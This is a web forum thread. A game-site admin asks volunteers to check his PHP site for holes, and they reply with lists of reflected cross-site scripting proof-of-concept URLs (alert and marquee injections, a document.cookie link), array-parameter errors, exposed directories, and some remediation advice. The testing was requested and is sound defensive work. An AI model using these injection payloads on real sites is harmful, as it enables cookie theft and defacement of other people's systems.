Jump to content

Please Check it for any Hole/Vuln.

themafiaman.com

By themafiaman.com
in Beta Test Your Stuff!

 Share

Recommended Posts

themafiaman.com Newbie

themafiaman.com

Posted
Posted

Hello All experts i am new member here and 1st day i found this forum very interesting and knowledgeable , If you all can Test my this site  for any Vuln. i would be thankfull to all PHPFreaks . www.themafiaman.com its a online MMORPG game , its a premade script and our hosting provider team do additional modification for the game , PLease check my site and report me. And its a request If you find any hole in it Please do not do something bad we all are here for helping each other . If i would be able to provide any kind of help to PHP Freaks or any member i will surely do.

 

Thanks

Regards The Mafia Man Admin

 

[move]PHp Freaks [/move]

Link to comment
https://forums.phpfreaks.com/topic/75415-please-check-it-for-any-holevuln/
Share on other sites
source Newbie

source

Posted
Posted

first hole is in the register on step three if you put ">code as ur last name hit enter it runs.

 

http://www.themafiaman.com/signup.php?step=4&email=%22%3E%3Cmarquee%3Elolz&referer=

 

http://www.themafiaman.com/signup.php?step=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&email=lolwtf@aol.com&referer=

 

http://themafiaman.com/signup.php?step=3&refer=%22%3E%3Cmarquee%3Elolz

 

http://themafiaman.com/tru/board.php?tru=10&action=post

xss in message... and I can make it link to say <a href="javascript:alert(document.cookie)">CLICK HERE</a>

source Newbie

source

Posted
Posted

http://www.themafiaman.com/tru/board.php?brd=recruit&tru=10

 

http://www.themafiaman.com/tru/pimp.php?tru=10

 

both xssable

 

 

I can't finish cause some stupid fuck face disabled my account.

 

Anyway this is the LAST time you will see me make a post on these forums. I do not believe you should help admins fix security holes anymore. Open-source/full disclosure is bad. I discourage everyone from doing it.

 

Agentsteal I hope you read this... Don't waste your time with this helping people fix security anymore. It's a complete waste of time.

 

 

lolz

themafiaman.com Newbie

themafiaman.com

Posted
  • Author
Posted

Mate Thanks For your support and checking my site actually one of our moderator didn't know about testing so he find you suspecious and Banned you Please complete your test i am making your account normal .

Me and my all staff is sorry for what happend with you

Thanks

Regards

agentsteal Newbie

agentsteal

Posted
Posted

Array:

http://www.themafiaman.com/confirm.php?referer[]

 

Array:

http://www.themafiaman.com/signup.php?step[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&age[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&cpassword[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&email[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&first[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&last[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&messager_id[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&password[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&refer[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&username[]

 

Array:

http://www.themafiaman.com/signup.php?step=4&email[]

 

Array:

http://www.themafiaman.com/signup.php?step=4&referer[]

 

Cross Site Scripting:

http://www.themafiaman.com/confirm.php?referer="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&age="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&cpassword="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&email="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&first="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&last="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&messager_id="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&password="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&refer="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&username="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=4&email=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=4&referer="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/confirm.php if the email address contains code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/resend.php if the email address contains code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/support.php if the To field contains code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Your Name field contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Friends Name field contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Friends Email field contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Refferal Link field contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/winners.php if the drop down menus contain code.

 

Cross Site Scripting:

There is Cross Site Scripting if you submit a directory search that contains code.

 

Cross Site Scripting:

There is Cross Site Scripting if you submit a family search that contains code.

 

Drop Down Menu:

If you edit the drop down menu on http://www.themafiaman.com/winners.php you can submit arbitrary values.

 

Drop Down Menu:

If you edit the round drop down menu on http://www.themafiaman.com/credits.php you can submit arbitrary values.

 

Maximum Length:

If you edit the fields you can remove the maximum lengths.

 

User Enumeration:

http://www.themafiaman.com/~root

php_tom Newbie

php_tom

Posted
Posted

Also this probably should only be accessiible if you've logged in:

  http://themafiaman.com/cgi-sys/mchat.cgi?channel=themafiaman.com

 

I got that from this page which should be blocked:

  http://themafiaman.com/chat

 

Not such a problem, but you might hide this directory:

  http://themafiaman.com/include/

 

That's all for now.

php_tom Newbie

php_tom

Posted
Posted

For hiding the contents of a directory, either disable directory listing on the server, or have an index.php in each directory with 

 <?php header("Location: http://www.themafiaman.com"); exit(0); ?>

 

Cross site scripting (XSS) can be fixed by validating ALL user input. See this article:

  http://www.htmlcenter.com/tutorials/tutorials.cfm/149/PHP/

Basically you just want to restrict as much as possible what input a user can give.

 

For Array errors, just add a line 

 <?phpif(is_array(<the variable>)) <the variable> = <the variable>[0]; ?>

 

That should fix most of your troubles.

 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.